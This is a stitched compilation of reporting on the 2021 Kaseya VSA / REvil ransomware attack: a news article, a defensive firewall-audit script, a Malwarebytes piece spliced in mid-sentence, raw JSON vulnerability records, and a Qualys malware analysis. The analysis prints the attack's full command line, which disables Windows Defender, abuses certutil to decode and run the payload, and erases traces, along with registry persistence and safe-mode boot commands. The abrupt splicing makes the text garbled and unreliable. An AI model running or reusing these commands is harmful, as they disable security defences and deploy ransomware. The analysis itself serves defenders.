Amidst the massive [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) that triggered an infection chain compromising thousands of businesses on Friday, new details have emerged about how the notorious Russia-linked REvil cybercrime gang may have pulled off the unprecedented hack.
The Dutch Institute for Vulnerability Disclosure (DIVD) on Sunday [revealed](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>) it had alerted Kaseya to a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) that it said were being exploited as a conduit to deploy ransomware. The non-profit entity said the company was in the process of resolving the issues as part of a coordinated vulnerability disclosure when the July 2 attacks took place.
More specifics about the flaws were not shared, but DIVD chair Victor Gevers [hinted](<https://twitter.com/0xDUDE/status/1411478505641099265>) that the zero-days are trivial to exploit. At least 1,000 businesses are said to have been affected by the attacks, with victims identified in no less than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, according to ESET.
[Kaseya VSA](<https://www.kaseya.com/products/vsa/>) is a cloud-based IT management and remote monitoring solution for managed service providers (MSPs), offering a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access via two-factor authentication.
### REvil Demands $70 Million Ransom
Active since April 2019, [REvil](<https://attack.mitre.org/software/S0496/>) (aka Sodinokibi) is best known for [extorting $11 million](<https://thehackernews.com/2021/06/beef-supplier-jbs-paid-hackers-11.html>) from the meat-processor JBS early last month, with the ransomware-as-a-service business accounting for about 4.6% of attacks on the public and private sectors in the first quarter of 2021.
The group is now asking for a record $70 million ransom payment to publish a universal decryptor that can unlock all systems that have been crippled by file-encrypting ransomware.
"On Friday (02.07.2021) we launched an attack on MSP providers. More than a million systems were infected. If anyone wants to negotiate about universal decryptor – our price is 70,000,000$ in BTC and we will publish publicly decryptor that decrypts files of all victims, so everyone will be able to recover from attack in less than an hour," the REvil group posted on their dark web data leak site.
Kaseya, which has enlisted FireEye to help with its investigation into the incident, [said](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) it intends to "bring our SaaS data centers back online on a one-by-one basis starting with our E.U., U.K., and Asia-Pacific data centers followed by our North American data centers."
On-premises VSA servers will require the installation of a patch prior to a restart, the company noted, adding it's in the process of readying the fix for release on July 5.
### CISA Issues Advisory
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [issue an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>), urging customers to download the [Compromise Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that Kaseya has made available to identify any indicators of compromise (IoC), enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.
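As an added illustration (not code from the article, CISA or Kaseya), the following Python script audits a constructed firewall rule set against two of the controls in the advisory above: the RMM administrative interface reachable only from a dedicated admin network or VPN, and agent traffic limited to known IP address pairs. The port numbers, addresses and rule names are assumptions, not Kaseya's documented values.

```python
"""Audit a firewall rule set for an RMM server against two controls in the CISA
advisory: agent traffic limited to known IP address pairs, and the RMM
administrative interface reachable only from a dedicated admin network or VPN.
All addresses, ports and rule names below are constructed for this example and
are not Kaseya's documented values."""
import ipaddress
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    src: str      # source CIDR
    dst: str      # destination CIDR
    port: int     # destination TCP port
    action: str   # "allow" or "deny"


# Constructed policy: port 443 is assumed to be the admin web UI, port 5721 the
# agent check-in service (placeholder numbers, not vendor documentation).
ADMIN_PORTS = {443}
AGENT_PORTS = {5721}
RMM_SERVER = ipaddress.ip_network("198.51.100.10/32")
# The only network allowed to reach the admin UI: a dedicated admin VLAN / VPN pool.
ADMIN_NETWORKS = [ipaddress.ip_network("10.50.0.0/24")]
# Known (agent network, RMM server) pairs that may talk to the agent port.
KNOWN_AGENT_PAIRS = [(ipaddress.ip_network("203.0.113.0/24"), RMM_SERVER)]


def _within(net, allowed) -> bool:
    """True if every address in `net` falls inside one of the allowed networks."""
    return any(net.version == a.version and net.subnet_of(a) for a in allowed)


def audit(rules: List[Rule]) -> List[Tuple[str, str]]:
    """Return (rule name, problem) for every allow rule that violates the policy.

    A rule that lets a broad source (for example 0.0.0.0/0) reach the admin or
    agent port is flagged, because that is exactly the internet-facing exposure
    the advisory tells operators to remove.
    """
    findings = []
    for r in rules:
        if r.action != "allow":
            continue  # deny rules cannot widen exposure
        src = ipaddress.ip_network(r.src)
        dst = ipaddress.ip_network(r.dst)
        if r.port in ADMIN_PORTS:
            if not _within(src, ADMIN_NETWORKS):
                findings.append((r.name, "admin interface reachable from outside the admin network"))
        elif r.port in AGENT_PORTS:
            if not any(_within(src, [a]) and _within(dst, [s]) for a, s in KNOWN_AGENT_PAIRS):
                findings.append((r.name, "agent port not limited to a known source/destination pair"))
    return findings


# Constructed sample rule set, as an operator might export it from a perimeter firewall.
SAMPLE_RULES = [
    Rule("admin-from-internet", "0.0.0.0/0", "198.51.100.10/32", 443, "allow"),
    Rule("admin-from-vpn", "10.50.0.0/24", "198.51.100.10/32", 443, "allow"),
    Rule("agents-known-site", "203.0.113.0/24", "198.51.100.10/32", 5721, "allow"),
    Rule("agents-from-anywhere", "0.0.0.0/0", "198.51.100.10/32", 5721, "allow"),
    Rule("default-deny", "0.0.0.0/0", "0.0.0.0/0", 0, "deny"),
]

if __name__ == "__main__":
    for name, problem in audit(SAMPLE_RULES):
        print(f"{name}: {problem}")
```

Running the script flags the two rules that expose the admin UI and the agent port to any source, while the VPN-only admin rule and the known agent pair pass.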
"Less than ten organizations [across our customer base] appear to have been affected, and the impact appears to have been restricted to systems running the Kaseya software," Barry Hensley, Chief Threat Intelligence Officer at Secureworks, told The Hacker News via email.
"We have not seen evidence of the threat actors attempting to move laterally or propagate the ransomware through compromised networks. That means that organizations with wide Kaseya VSA deployments are likely to be significantly more affected than those that only run it on one or two servers."
By compromising a software supplier to target MSPs, which in turn provide infrastructure or device-centric maintenance and support to other small and medium businesses, the incident once again underscores the importance of securing the software supply chain. It also highlights how financially motivated actors are combining two threats, supply chain attacks and ransomware, to strike hundreds of victims at once.
"MSPs are high-value targets — they have large attack surfaces, making them juicy targets to cybercriminals," said Kevin Reed, chief information security officer at Acronis. "One MSP can manage IT for dozens to a hundred companies: instead of compromising 100 different companies, the criminals only need to hack one MSP to get access to them all."
The vulnerability is simple to execute and enables attackers to perform [remote code execution](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>).\n\nA patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it \u2014 and at least one of them was successful.\n\nShortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from [Mandiant](<https://www.mandiant.com/resources/apt41-us-state-governments>). Once they gained access to internet-facing systems, APT41 began a months-long campaign of [reconnaissance ](<https://blog.malwarebytes.com/glossary/recon/>)and credential harvesting.\n\n## 2. North Korean government backed-groups exploit Chrome zero-day vulnerability\n\nOn February 10 2022, Google's Threat Analysis Group (TAG) [discovered that two North Korean government backed-groups ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-chrome-patches-actively-exploited-zero-day-vulnerability/>)exploited a vulnerability ([**CVE-2022-0609**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>)) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.\n\nThe activities of the two groups have been tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and[ AppleJeus](<https://securelist.com/operation-applejeus/87553/>), and both of them used the same [exploit kit](<https://blog.malwarebytes.com/threats/exploit-kits/>) to collect sensitive information from affected systems.\n\nHow does it work, you ask? 
Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome \u2014 which, just like Log4Shell, allows hackers to perform remote code execution.\n\n## 3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability\n\nFrom September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by[ exploiting a vulnerability** **](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>)[**(CVE-20**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[2](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[**1-40539)**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)[ in ManageEngine ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>), a self-service password management and single sign-on solution.\n\nSo, what happens after hackers exploited this vulnerability? You guessed it \u2014 remote code execution. Specifically, hackers uploaded a [payl](<https://blog.malwarebytes.com/glossary/payload/>)[oad ](<https://blog.malwarebytes.com/glossary/payload/.>)to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.\n\nFrom there, hackers [moved laterally](<https://blog.malwarebytes.com/glossary/lateral-movement/>) to other systems on the network, exfiltrated any files they pleased, and [even stole credentials](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>).\n\n## 4. 
Tallinn-based hacker exploits Estonian government platform security vulnerabilities\n\n[In July 2021](<https://www.ria.ee/en/news/police-and-border-guard-board-and-information-system-authority-stopped-illegal-downloading-data.html>), Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia\u2019s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.\n\nTo do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person's ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received \u2014 and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.\n\n## 5. Russian hackers exploit Kaseya security vulnerabilities\n\nKaseya, a Miami-based software company, provides tech services to thousands of businesses over the world \u2014 and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: [shut down your servers immediately](<https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/>).\n\nThe urgency was warranted. [Over 1,500 small and midsize businesses](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) had just been attacked, with attackers asking for $70 million in payment.\n\nA Russian-based cybergang known as REvil claimed responsibility for the attack. 
According to Hunteress Labs, REvil [exploi](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>)[ted a zero-day](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) ([CVE-](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)[2021-30116](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)) and performed an authentication bypass in Kaseya's web interface \u2014 allowing them to deploy [a ransomware attack](<https://blog.malwarebytes.com/ransomware/2021/07/3-things-the-kaseya-attack-can-teach-us-about-ransomware-recovery/>) on MSPs and their customers.\n\n## Organizations need a streamlined approach to vulnerability assessment\n\n[Hackers took advantage](<https://blog.malwarebytes.com/hacking-2/2022/05/10-ways-attackers-gain-access-to-networks/>) of many security vulnerabilities in 2021 to breach an array of governments and businesses.\n\nAs we broke down in this article, hackers can range from individuals to whole state-sponsored groups \u2014 and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.\n\nAnd while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right [vulnerability management](<https://www.malwarebytes.com/cybersecurity/business/what-is-vulnerability-management>) and[ patch management](<https://www.malwarebytes.com/cybersecurity/business/what-is-patch-management>), however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.\n\nWant to learn more about different vulnerability and patch management tools? 
Visit our [Vulnerability and Patch Management page](<https://www.malwarebytes.com/business/vulnerability-patch-management>) or read the [solution brief](<https://www.malwarebytes.com/resources/easset_upload_file46277_212091_e.pdf>).\n\nThe post [Security vulnerabilities: 5 times that organizations got hacked](<https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-21T10:04:02", "type": "malwarebytes", "title": "Security vulnerabilities: 5 times that organizations got hacked", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-06-21T10:04:02", "id": "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "href": "https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": 
"2022-02-16T19:30:18", "description": "A remote code execution vulnerability exists in Kaseya VSA. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-27T00:00:00", "type": "checkpoint_advisories", "title": "Kaseya VSA Remote Code Execution (CVE-2021-30116)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-12-27T00:00:00", "id": "CPAI-2021-0946", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-07-28T14:34:25", "description": "On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. The REvil ransomware attack leveraged multiple zero-day vulnerabilities in Kaseya\u2019s VSA (Virtual System/Server Administrator) product that helps Kaseya customers to monitor and manage their infrastructure. 
To deploy ransomware payloads on the systems of Kaseya customers and their clients, the REvil operators exploited zero-day vulnerability CVE-2021-30116.\n\nREvil ransomware (also known as Sodinokibi) is ransomware-as-a-service (RaaS), meaning an attacker distributes the licensed copy of this ransomware over the internet and the ransom is split between the developers. After an attack, REvil would threaten to publish the information on their page 'Happy Blog' unless the ransom is received.\n\n**Image Source**: [DarkTracer](<https://twitter.com/darktracer_int/status/1411866196199178244>)\n\nThe REvil ransomware group has demanded a $70 million payment to provide a universal decryptor tool to unlock the files corrupted by REvil ransomware.\n\nREvil\u2019s attacks on Kaseya VSA servers have led to outages in unexpected places, such as supermarket chains in Sweden, kindergartens in New Zealand, and some public administration offices in Romania. In a message posted on their dark web [blog](<https://twitter.com/darktracer_int/status/1411866196199178244>), the REvil gang officially took credit for the attack for the first time and claimed they locked more than one million systems during the Kaseya incident.\n\nOn July 4, [CISA and FBI](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) published an advisory to respond to REvil attack and have urged users to download the [Kaseya VSA Detection Tool](<https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40>) that determines if any indicators of compromise are present on system.\n\nKaseya is sharing regular updates on their [website](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-3rd-2021>) and believes that this has been localized to a very small number of on-premises customers only.\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification 
of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with Kaseya installed.\n\nsoftware:(publisher:Kaseya and product:"Kaseya Agent")\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cREvil ransomware\u201d. This helps in automatically grouping existing hosts with ransomware as well as any new systems that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n### Discover Kaseya VSA Vulnerability\n\nNow that hosts with REvil Ransomware are identified, you want to detect which of these assets have flagged this vulnerability. Qualys VMDR automatically detects new vulnerabilities like Kaseya VSA based on the always updated Knowledgebase.\n\nQualys has released an IG (information gathered) QID to detect the presence of Kaseya VSA.\n\nYou can see all your impacted hosts for this vulnerability tagged with the 'REvil Ransomware\u201d asset tag in the vulnerabilities view by using this QQL query:\n\n`vulnerabilities.vulnerability.qid: 48187`\n\nThis will return a list of all hosts that have Kaseya VSA installed.\n\n\n\nIG QID: 48187 is available in signature version VULNSIGS-2.5.226-3 and above and can be detected remotely.\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n\n\nWith Qualys Unified Dashboard, you can track REvil ransomware, impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of Kaseya VSA vulnerability trends, EDR events and ransomware-related compliance controls in your environment using the [REvil ransomware Dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n\n\n### Workarounds\n\nDisable RDP if not used. If required change the RDP port to a non-standard port.\n\nAfter identifying vulnerable assets, monitor them for malicious activity. \n\nAs a best practice, follow these steps:\n\n * Keep operating systems, software, and applications current and up to date.\n * Make sure anti-virus and anti-malware solutions are set to automatically update and run regular scans.\n * Create backup copies of all important data as a good step towards securing the data. Backup copies can be kept on physically disconnected systems to maximize security.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical Kaseya VSA vulnerability CVE-2021-30116.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T17:07:54", "type": "qualysblog", "title": "Kaseya REvil Ransomware Attack (CVE-2021-30116) \u2013 Automatically Discover and Prioritize Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T17:07:54", "id": "QUALYSBLOG:BBCD3487C0EA48E69315B0BB5F23D1C4", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:34:25", "description": "Over the past year, there has been a rise in extortion malware, e.g. [Nefilim](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>) and [Darkside](<https://blog.qualys.com/vulnerabilities-research/2021/06/09/darkside-ransomware>), which steal and threaten to publish sensitive data or encrypt it until a ransom is paid. Nowadays, cybercriminals use various techniques to gain their initial foothold within a network in the organization. One of the techniques is a supply chain attack.\n\nIn a software supply chain attack, hackers compromise an organization by manipulating the code in third-party software components used by the organization, such as what was seen with SolarWinds in December of 2020. On July 2, 2021, [Kaseya announced](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) its software had been compromised and was being used to attack the IT infrastructure of its customers. Kaseya VSA is an IT management suite, commonly used for managing software and patching for Windows OS, macOS, or third-party software. Unlike the SolarWinds attack, the attackers\u2019 goal was monetary gain rather than cyber espionage.\n\nThe attacks have been attributed to REvil, ransomware was first identified in April 2019 according to [MITRE](<https://attack.mitre.org/software/S0496/>). 
REvil is a ransomware family that has been linked to [GOLD SOUTHFIELD](<https://www.secureworks.com/research/threat-profiles/gold-southfield>), a financially motivated group that operates a \u201cRansomware as a service\u201d model. This group distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers.\n\nREvil attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web. During our research, we have seen some of the victim sample data on their onion site.\n\nFig. 1: Dark website\n\n### **Technical Details**\n\n#### **Initial access******\n\nThe ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability ([CVE-2021-30116](<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>)) in the Kaseya VSA server platform. 
\n\nSecurity researchers at [Huntress Labs](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) and [TrueSec](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) have identified three zero-day vulnerabilities potentially used into attacks against their clients, including:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability****\n\n[Multiple sources ](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>)have stated that the following file was used to install and execute the ransomware attack on Windows systems:\n\nThe "Kaseya VSA Agent Hot-fix\u201d procedure ran the following command: \n\n`\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe`\n\nThe above command disables Windows Defender, copies and renames certutil.exe to %SystemDrive%\\Windows, and decrypts the agent.crt file. Certutil.exe is mostly used as a \u201cliving-off-the-land\u201d binary and is capable of downloading and decoding web-encoded content. 
In order to avoid detection, the attacker copied this utility as %SystemDrive`%\\cert.exe` and executed the malicious payload agent.exe.\n\nagent.exe| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n---|--- \n \nThe agent.exe contains two resources (MODLS.RC, SOFIS.RC) in it as shown in the following image.\n\nFig. 2: Resource from agent.exe\n\nAgent.exe dropped these resources in the windows folder. Resources named MODLIS and SOFTIS were dropped as mpsvc.dll and MsMpEng.exe respectively.\n\nMODLIS| e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n---|--- \nmpsvc.dll| 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \nSOFTIS| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \nMsMpEng.exe| 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a \n \nMsMpeng.exe is an older version of Microsoft\u2019s Antimalware Service executable which is vulnerable to a DLL side-loading attack. In a DLL side-loading attack, malicious code is in a DLL file with a similar name which is required for the target executable.\n\nFig. 3: Version information of MsMpeng.exe\n\nFig. 4: Digital certificate information of MsMpeng.exe\n\nAgent.exe then drops MsMpeng.exe and mpsvc.dll. After dropping these two files, agent.exe executes MsMpeng.exe as shown in the following image.\n\nFig. 5: Drop files and create a process of MsMpEng.exe\n\n### **Ransomware Execution******\n\nWhen MpMseng.exe runs and calls the ServiceCrtMain, the Malicious Mpsvc.dll loads and gets loaded and executed.\n\nFig. 6: ServiceCrtMain call function of MsMpEng.exe\n\nFig. 7: ServiceCrtMain call function of MsMpEng.exe\n\nRansomware uses OpenSSL to conduct its Cryptographic Operations.\n\nFig. 8: Use OpenSSL to conduct Cryptographic Operations\n\nMalware uses \u2018CreateFileMappingW\u2019 and \u2018MapViewOfFile\u2019 functions to bring code in memory. \u2018CreateFileMapping\u2019 function is useful to load a file into memory. 
The function creates a handle to the mapping while the \u2018MapViewOfFile\u2019 function maps the file into memory space and returns a pointer to the start of the mapped file.\n\nFig. 9: Use CreateFileMappingW and MapViewOfFile to bring code in memory \n\nMalware allocates memory and decrypts the main payload (PE file) in memory. Malware removes some unused magic constants from the header to evade it. Magic constants such as 0x4D5A (MZ) 0x5045 (PE). This method requires loading and executing a payload just like a shellcode.\n\nNowadays most of malware authors use custom packers, these packers, unpack and load payload module without PE Header magic constants at load time. These Packers keep other relevant information from PE Header, such as section header, API import, and relocations data, etc.\n\nFig. 10: Main Payload \n\nMalware Decrypts and bring config file. Config file is in JSON format.\n\nFig. 11: Config File\n\nConfig file contain following fields.\n\nField| Definition \n---|--- \npk | Public key in base 64 \npid | Version ID \nsub | tag Number \ndbg | Is it dbg mode \net | encryption type \nwipe | wipe folder flag \nfld | Folder list that wants to to skip during the encryption process \nfls | File list that wants to to skip during the encryption process \next | file extension that wants to to skip during the encryption process \nwfld | The folder it wants to wipe \nprc | Process name list it wants to terminate \ndmn | Potential list of C&C Domains \nnet | Communication flag \nsvc | Service name list that wants to stop \nnbody | Ransomware note in base64 format \nnname | Ransomware note file extension \nexp | Flag to local privledge escalation \nimg | Ransomware note that will be in bitmap form \narn | Persistence flag \nrdmcnt | Readme count \n \nRansomware makes the following changes in the local Firewall rule.\n\n\u201cnetsh advfirewall firewall set rule group==\u201dNetwork Discovery\u201d new enable=Yes\u201d\n\nFig. 
12: Command to change local firewall\n\nIt creates the following Registry entry: \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter`\n\nThe following values are added in HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\BlackLivesMatter:\n\n`96Ia6 = {Hex Value}` \n`Ed7 = {Hex Value}` \n`JmfOBvhb = {Hex Value}` \n`QIeQ = {Hex Value}` \n`Ucr1RB = {Hex Value}` \n`wJWsTYE = .{appended extension to files after encryption}`\n\n\n\nThe malware adds registry values under the following Registry Key. \n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon`\n\n * AutoAdminLogon = 1 \n * DefaultUserName = {Current User Name} \n * DefaultPassword = \u201cDTrump4ever\u201d \n\nWith the above Registry values, windows will automatically log in with new account information. \n\nThe malware executes the following commands to force the computer to boot into safe mode with Networking: \n`bcdedit /set {current} safeboot network`\n\nAlso, malware add the same command in Registry under \n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce`\n\n`*MarineLePen = bcdedit /set {current} safeboot network `\n\nFinally, a ransom note is dropped using a random filename for example \u201cs5q78-readme.txt\u201d.\n\nFig. 
